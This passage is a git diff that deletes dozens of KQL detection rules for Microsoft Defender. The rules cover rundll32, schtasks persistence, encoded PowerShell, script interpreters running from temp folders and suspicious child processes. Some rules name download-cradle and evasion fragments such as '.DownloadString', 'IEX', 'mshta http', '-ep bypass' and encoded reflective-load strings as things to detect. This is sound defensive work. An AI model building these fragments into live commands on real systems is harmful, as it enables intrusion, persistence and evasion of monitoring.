-// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
-// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql
deleted file mode 100644
index 8cf3471a..00000000
--- a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.communitly
-// Date: 2020/10/13
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
deleted file mode 100644
index 3d746a96..00000000
--- a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql
deleted file mode 100644
index 0e49c7fb..00000000
--- a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
deleted file mode 100644
index c68909e4..00000000
--- a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/Execution/Schtasks_From_Suspicious_Folders.kql b/Execution/Schtasks_From_Suspicious_Folders.kql
deleted file mode 100644
index 7ef23c76..00000000
--- a/Execution/Schtasks_From_Suspicious_Folders.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/15
-// Level: high
-// Description: Detects scheduled task creations that have suspicious action command and folder combinations
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Execution/Script_Event_Consumer_Spawning_Process.kql b/Execution/Script_Event_Consumer_Spawning_Process.kql
deleted file mode 100644
index f27035e7..00000000
--- a/Execution/Script_Event_Consumer_Spawning_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2021/06/21
-// Level: high
-// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql b/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql
deleted file mode 100644
index ce37fdfb..00000000
--- a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/08
-// Level: high
-// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 28498146..00000000
--- a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
-When the test completes, a service information will be displayed on the screen if it exists.
-A common feedback message is that "No instance(s) Available" if the service queried is not running.
-A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
-
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
deleted file mode 100644
index c22f6141..00000000
--- a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/04
-// Level: medium
-// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql b/Execution/Service_StartupType_Change_Via_Sc.EXE.kql
deleted file mode 100644
index dc89c692..00000000
--- a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: medium
-// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql
deleted file mode 100644
index 572e8c51..00000000
--- a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/11/24
-// Level: high
-// Description: Detects shell32.dll executing a DLL in a suspicious directory
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Execution/Start_Windows_Service_Via_Net.EXE.kql b/Execution/Start_Windows_Service_Via_Net.EXE.kql
deleted file mode 100644
index 2357f3be..00000000
--- a/Execution/Start_Windows_Service_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
-// Tags: attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql b/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql
deleted file mode 100644
index 03b12aec..00000000
--- a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jason Lynch
-// Date: 2019/04/02
-// Level: high
-// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
-// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
-DeviceProcessEvents
-| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe"))
\ No newline at end of file
diff --git a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index d6006a54..00000000
--- a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: high
-// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql b/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql
deleted file mode 100644
index e2eb0ec4..00000000
--- a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/23
-// Level: high
-// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Csi.exe_Usage.kql b/Execution/Suspicious_Csi.exe_Usage.kql
deleted file mode 100644
index ea5c49ee..00000000
--- a/Execution/Suspicious_Csi.exe_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/17
-// Level: medium
-// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
-// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Electron_Application_Child_Processes.kql b/Execution/Suspicious_Electron_Application_Child_Processes.kql
deleted file mode 100644
index 81ee345f..00000000
--- a/Execution/Suspicious_Electron_Application_Child_Processes.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
-
-// Tags: attack.execution
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) and (not(((FolderPath endswith "\\chrome.exe" and InitiatingProcessFolderPath endswith "\\chrome.exe") or (FolderPath endswith "\\discord.exe" and InitiatingProcessFolderPath endswith "\\discord.exe") or (FolderPath endswith "\\GitHubDesktop.exe" and InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe") or (FolderPath endswith "\\keybase.exe" and InitiatingProcessFolderPath endswith "\\keybase.exe") or (FolderPath endswith "\\msedge.exe" and InitiatingProcessFolderPath endswith "\\msedge.exe") or (FolderPath endswith "\\msedgewebview2.exe" and InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") or (FolderPath endswith "\\msteams.exe" and InitiatingProcessFolderPath endswith "\\msteams.exe") or (FolderPath endswith "\\slack.exe" and InitiatingProcessFolderPath endswith "\\slack.exe") or (FolderPath endswith "\\teams.exe" and InitiatingProcessFolderPath endswith "\\teams.exe") or (FolderPath in~ ("C:\\Windows\\SysWOW64\\WerFault.exe", "C:\\Windows\\System32\\WerFault.exe"))))) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
deleted file mode 100644
index c8bc79a5..00000000
--- a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql b/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql
deleted file mode 100644
index 28b221a3..00000000
--- a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
-// Date: 2018/09/03
-// Level: high
-// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned "))
\ No newline at end of file
diff --git a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql b/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql
deleted file mode 100644
index dcbabf9d..00000000
--- a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
-// Tags: attack.execution
-DeviceProcessEvents
-| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql b/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql
deleted file mode 100644
index 5ee1184e..00000000
--- a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/02
-// Level: medium
-// Description: Commandline to launch powershell with a base64 payload
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding ")))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql b/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql
deleted file mode 100644
index c1cea9e1..00000000
--- a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Sander Wiebing
-// Date: 2018/11/22
-// Level: medium
-// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
-// Tags: attack.execution, attack.t1059.006
-DeviceProcessEvents
-| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Created_In_PerfLogs.kql b/Execution/Suspicious_File_Created_In_PerfLogs.kql
deleted file mode 100644
index 45c8e0fb..00000000
--- a/Execution/Suspicious_File_Created_In_PerfLogs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
-// Tags: attack.execution, attack.t1059
-DeviceFileEvents
-| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
deleted file mode 100644
index 99d431f0..00000000
--- a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
-// Tags: attack.defense_evasion, attack.execution
-DeviceFileEvents
